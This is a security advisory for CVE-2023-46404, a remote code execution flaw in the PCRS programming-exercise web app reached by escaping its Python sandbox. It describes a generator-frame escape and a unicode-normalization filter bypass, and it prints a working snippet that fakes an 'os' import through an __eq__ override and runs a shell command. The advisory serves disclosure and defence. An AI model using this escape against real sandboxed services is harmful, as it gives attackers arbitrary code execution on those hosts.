# CVE-2023-46404

[PCRS]( is a webapp for online programming exercises developed at the University of Toronto.
See Bitbucket repository:

## Summary
PCRS “Questions” page with code submission and “Code editor” page are vulnerable to remote code execution (RCE) by escaping Python sandboxing.

## Details
Remote code execution can be achieved in PCRS instances through the use of generator objects. By using generator frames (gi_frame) and f_back, scripts can traverse out of a sandboxed stack frame and execute malicious code in an unsandboxed environment. Additionally, unicode normalization can easily bypass basic input sanitization. Any authenticated user with minimum privileges can perform this attack. See PoC for more details.

## Known Affected Versions
* PCRS <= 3.11 d0de1e with Python execution.
* Patch implemented in [9326ad3]( with partial mitigation in [

## Mitigation
Crafting secure isolation mechanisms from scratch is prone to oversights and vulnerabilities. As always, it is better to sandbox an execution environment than a language.

### Extra
Overriding `__eq__` can be used in a restricted environment:

def f():
    mod_name = "os"
    fake_name = "json"
    os = __import__(type("s", (str,), {"__eq__": lambda x, y: y == fake_name or y == mod_name, "__hash__": lambda x: hash(mod_name)})(mod_name))
    os.system("id > /tmp/test.txt")
    s = ᵒpen("/tmp/test.txt").read() # unicode normalization of the "open" function
    os.system("rm /tmp/test.txt")
    return s